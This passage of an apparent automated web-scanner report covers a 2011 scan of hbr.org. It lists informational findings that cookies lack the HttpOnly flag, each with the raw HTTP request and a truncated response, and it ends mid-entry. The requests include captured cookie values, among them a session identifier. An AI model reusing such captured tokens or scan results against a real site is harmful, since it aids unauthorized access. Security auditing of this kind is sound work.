HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:30 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:23 GMT ETag: "67ede-237-4a8887a04dbc0" Accept-Ranges: bytes Content-Length: 567 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:30 GMT LEG: 5 Content-Type: image/gif GIF89aQ.......Sj..1...........................................2L.......E\.au.........."?.x............!......!.......,....Q...... .xdi.h..l.6."7...x..|..@....yl..r..6EOsJ.......... ..K.....'....G.L....[SNIP]...
4.29. http://hbr.org/hbrg-main/resources/images/store_header.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/store_header.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/store_header.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:26 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:21:07 GMT ETag: "67f0b-8d7-4a8887ca43ec0" Accept-Ranges: bytes Content-Length: 2263 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:26 GMT LEG: 5 Content-Type: image/gif GIF89a.............EBB`]].........zxx............mjkSOP845...!.......,.............I..8....`(.di.&..l..p\.rm.0..|+.T.G,...b..l:....(p.I...X.jc.o.A......I.4..F. ......pa..Fku.w.y<G~..,a.Eq......D.; U....[SNIP]...
4.30. http://hbr.org/hbrg-main/resources/scripts/coremetrics/cmdatatagutils.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/coremetrics/cmdatatagutils.min.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/coremetrics/cmdatatagutils.min.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Thu, 22 Apr 2010 01:56:55 GMT ETag: "67f29-2f7c-484c9a007c7c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 12156 Content-Type: application/x-javascript <!-- var cm_exAttr=new Array;var cm_ClientID="90105883";var cm_TrackLink="A";var cm_TrackImpressions="R";var cm_JSFEnabled=false;var cmJv="1.0";if(typeof(isNaN)=="function")cmJv="1.1";if(typeof(isFin...[SNIP]...
4.31. http://hbr.org/hbrg-main/resources/scripts/coremetrics/v40/eluminate.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/coremetrics/v40/eluminate.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/coremetrics/v40/eluminate.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Tue, 13 Sep 2011 18:11:18 GMT ETag: "6801c-7876-4acd691ec3d80" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 30838 Content-Type: application/x-javascript /*Copyright 2000-2005,Coremetrics 4.2.7-b $Revision:111657 $*/if(!cGB){var cGB=true;if(!cm_ClientID){var cm_ClientID="99999999";}if(!cm_HOST){var cm_HOST="test.coremetrics.com/cm?";}if(!cm_ClientTS){v...[SNIP]...
4.32. http://hbr.org/hbrg-main/resources/scripts/hbrg/google_book_preview_check.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/hbrg/google_book_preview_check.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/hbrg/google_book_preview_check.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Tue, 11 May 2010 21:09:02 GMT ETag: "67f8f-5a8-48657ef4e3780" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 1448 Content-Type: application/x-javascript // checks to see if the Google Book preview is present, and if so, insert img that links to Google book preview // if there isn't a Google Book preview present, no img tag is inserted - this logic ch...[SNIP]...
4.33. http://hbr.org/hbrg-main/resources/scripts/marketing/baynote.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/marketing/baynote.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/marketing/baynote.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Mon, 10 May 2010 16:08:25 GMT ETag: "12e8d7-3fdb-4863f9e601040" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 16347 Content-Type: application/x-javascript var BaynoteJSVersion="$Revision: 3.17 $";var BaynoteIgnored=false;var BN_READY_SIGNAL="ReadySignal";var Strategy={"ScriptDOMInject":2,"OnLoadInject":3};if(typeof(baynote_globals)=="undefined")var bay...[SNIP]...
4.34. http://hbr.org/hbrg-main/resources/scripts/marketing/marketing.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/marketing/marketing.min.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/marketing/marketing.min.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Thu, 03 Nov 2011 19:17:51 GMT ETag: "12e975-f7d-4b0d971d4b5c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 3965 Content-Type: application/x-javascript $(document).ready(function(){if($("#stay_connected").length!=0){animatedcollapse.addDiv("sc_detail_iphone","speed=800,persist=1,group=sc_detail");animatedcollapse.addDiv("sc_detail_newsletters","speed...[SNIP]...
4.35. http://hbr.org/hbrg-main/resources/scripts/most-jsonp.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/most-jsonp.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/most-jsonp.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Tue, 11 Oct 2011 20:39:58 GMT ETag: "5ffcb-6bb-4af0be9272380" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 1723 Content-Type: application/x-javascript var mostServer = "http://hbr.org" var mostUrlBase = mostServer + "/service/restv1/most-popular/" var mostDailyBlogs = "/most_hbr/10/" var mostDailyComments = "/commented/10/" var mostWidgetCMTag = "?c...[SNIP]...
4.36. http://hbr.org/hbrg-main/resources/scripts/paywall.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/paywall.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/paywall.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Tue, 11 Oct 2011 15:22:33 GMT ETag: "600ec-cd3-4af0779fb8040" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 3283 Content-Type: application/x-javascript // ==ClosureCompiler== // @compilation_level SIMPLE_OPTIMIZATIONS // @output_file_name paywall-min.js // ==/ClosureCompiler== var currentUrl = document.location.href; var paywallServer = "http:...[SNIP]...
4.37. http://hbr.org/hbrg-main/resources/scripts/plugins.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/plugins.min.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/plugins.min.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Fri, 26 Aug 2011 01:32:04 GMT ETag: "600f4-a647-4ab5e833e0d00" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 42567 Content-Type: application/x-javascript /* Animated Collapse for Stay Connected Widget */ var animatedcollapse={divholders:{},divgroups:{},lastactiveingroup:{},preloadimages:[],show:function(a){if(typeof a=="object")for(var b=0;b<a.length;...[SNIP]...
4.38. http://hbr.org/hbrg-main/resources/scripts/scripts.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/scripts.min.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/scripts.min.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:24 GMT Server: Apache Last-Modified: Thu, 27 Oct 2011 16:04:55 GMT ETag: "5faa1-5718-4b049eef557c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:24 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 22296 Content-Type: application/x-javascript var serverPrefix="http://hbr.org/",disableSearchSponsorship=true,toggleDrawer=function(){var b=$("#mastheadDrawerContent"),c=$("#exploreLink");b.hasClass("off")?(b.slideDown("fast"),b.removeClass("off...[SNIP]...
4.39. http://hbr.org/hbrg-main/resources/scripts/search-supplemental.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/search-supplemental.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/search-supplemental.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Fri, 14 Oct 2011 17:04:57 GMT ETag: "5fe62-601-4af4541b7a040" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 1537 Content-Type: application/x-javascript // search scripts function onClickSearchGo(formID) { var Nttvalue = document.getElementById(formID).value; if (Nttvalue != 'Search HBR.org') { var searchUrl = "/search/" + encodeURI...[SNIP]...
4.40. http://hbr.org/hbrg-main/resources/scripts/subscriber-search.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/subscriber-search.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/subscriber-search.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Wed, 06 Jul 2011 17:18:01 GMT ETag: "61069-13dc-4a769c8510440" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 5084 Content-Type: application/x-javascript var cookieName = 'srchPref'; var cookieValue = '1'; var cookieValidity = 365; //days // Should really update this to read them off the page since they differ between QA and PRD var subscriberPrefs = n...[SNIP]...
4.41. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:09:17 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.navfund.com/resources
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:17 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2Set-Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:09:17 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:17 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 47236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]...
4.42. http://hbr.org/products/12795-PDF-ENG/thumbnail/thumbnail.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/products/12795-PDF-ENG/thumbnail/thumbnail.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/12795-PDF-ENG/thumbnail/thumbnail.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
